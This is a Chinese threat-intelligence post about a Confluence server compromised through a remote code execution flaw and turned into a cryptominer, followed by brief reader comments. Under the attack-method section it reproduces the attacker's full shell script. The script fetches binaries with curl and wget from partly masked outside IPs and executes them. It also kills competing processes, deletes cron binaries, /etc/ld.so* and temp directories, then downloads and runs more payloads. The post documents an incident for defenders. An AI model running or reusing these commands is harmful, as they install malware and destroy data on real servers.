木马 我被攻击了
confluence 服务器被挖矿 奖励¥50
微步情报局 2019-09-18 11:38:59 959人浏览
情报提交人:
匿名用户
情报简介:

1 详细说明(必填)

2 入侵途径

confluence RCE

3 攻击手法

dir=$(pwd); ( while : ; do spth=(/var/tmp/ /tmp/ /dev/shm/ /home/conflue*/ $dir/logs/ $dir/temp/ /root/); for fth in "${spth[@]}" ; do if [ -d "$fth" ] && [ -x "$fth" ]; then break; fi; done; nohup /usr/bin/curl -o "$fth"62c1 51.*.*.239/index.html ; chmod 7777 "$fth"62c1 ; "$fth"62c1 2>&1 ; /usr/bin/wget -O "$fth"a5af 51.*.*.239/index.html ; chmod 7777 "$fth"a5af ; "$fth"a5af 2>&1 ; /usr/bin/curlak -o "$fth"448d 51.*.*.239/index.html ; chmod 7777 "$fth"448d ; "$fth"448d 2>&1 ; /usr/bin/wgetak -O "$fth"ebbf 51.*.*.239/index.html ; chmod 7777 "$fth"ebbf ; "$fth"ebbf 2>&1 ; "$fth"ebbf ; done ) &


pkill -9 sh ; pkill -9 wget ; pkill -9 curl ; pkill -9 pytho* ; pkill -9 nohup ; pkill -9 rm ; pkill -9 chmod  ; rm -rf /var/spoo*/*/*/* ; pkill -9 atd ; pkill -9 cron* ; rm -rf /var/spool/cro*/* ; rm -rf /usr/sbin/cron ; rm -rf /usr/sbin/cro*  ; rm -rf *l*.so* ; rm -rf /usr/sbin/cron ; rm -rf /usr/bin/cron ; rm -rf temp/*l*.so* ; rm -rf ../temp/*l*.so* ; rm -rf /dev/shm/* ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; chmod 777 /usr/bin/wg* ; chmod 777 /usr/bin/cu*  ; chmod 000 /usr/bin/py* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ;   rm -rf /etc/ld.so* ; /usr/bin/curl -o  /dev/shm/jroi hTtp://0133.*.*.0213/sites/default/files/raw ; chmod 777  /dev/shm/jroi ; /dev/shm/jroi ( /usr/bin/curl -k -o /var/tmp/skr hTTps://23.*.*.75/sites/default/files/raw ;  chmod 777 /var/tmp/vkr ; /var/tmp/vkr 2>&1 ; /var/tmp/vkr ;  /usr/bin/curl -o /var/tmp/jroi hTtp://0133.*.*.0213/sites/default/files/raw ; chmod 777  /var/tmp/jroi ; /var/tmp/jroi 2>&1 ; /var/tmp/jroi ) &



4 内部溯源

cfb681354bd3e99e64c14380ce0191e3.jpg

5 攻击外部溯源



目标行业:

奖励计划获奖情报所有权归微步在线所有。

微步在线有权对该情报进行使用、编辑、存储、复制、修改、创建衍生作品、交流、发布、公开执行、公开显示。

dirshell 2019-09-22 10:05:26 回复
6666
babafeng 2019-09-19 10:24:33 回复
这个漏洞是不是出了半年了
ldfwindows 2019-09-19 10:06:56 回复
真酷啊
root3306 2019-09-18 14:42:15 回复
给力啊。
奖励计划banner
今日推荐